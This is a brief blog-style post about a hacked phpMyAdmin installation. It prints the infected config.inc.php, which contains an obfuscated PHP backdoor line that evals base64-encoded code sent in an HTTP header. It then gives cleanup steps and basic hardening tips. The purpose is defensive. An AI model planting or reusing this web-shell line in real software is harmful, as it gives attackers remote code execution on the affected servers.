On one of my slices, my phpmyadmin shows a blank page every so often. This is caused by a remote code execution exploit. You’re getting hacked, but don’t be scared.
The bug/hack is single line in the file /var/lib/phpmyadmin/config.inc.php, which was corrupted.
Here is the whole file:
* Generated configuration file
* Version: $Id: setup.php,v 1.23.2.8.2.2 2006/05/15 07:57:09 nijel Exp $
* Date: Fri, 14 Aug 2009 14:24:39 GMT
*/
/* Servers configuration */
$i = 0;
/* Server (config:root) [1] */
*$cfg[‘Servers’][$i][‘xxx’];$z=‘bas’.‘e64_dec’.‘ode’;eval($z($_SERVER[‘HTTP_X_CODE’]));exit;#’] = ‘yyy’;
/* End of servers configuration */
To fix this issue, Shell into Ubuntu and Sudo up
Look for the line //*$cfg['Servers'][$i]['xxx'];$z=’bas’.'e64_dec’.'ode’;eval($z($_SERVER['HTTP_X_CODE']));exit;#’] = ‘yyy’;
comment it out with //
hit ctrl+x, press y, and lets reload apache
To avoid this problem:
- Avoid using phpmyadmin.yoursite.com or yoursite.com/phpmyadmin
- Use Htaccess passwords on the phpmyadmin directory
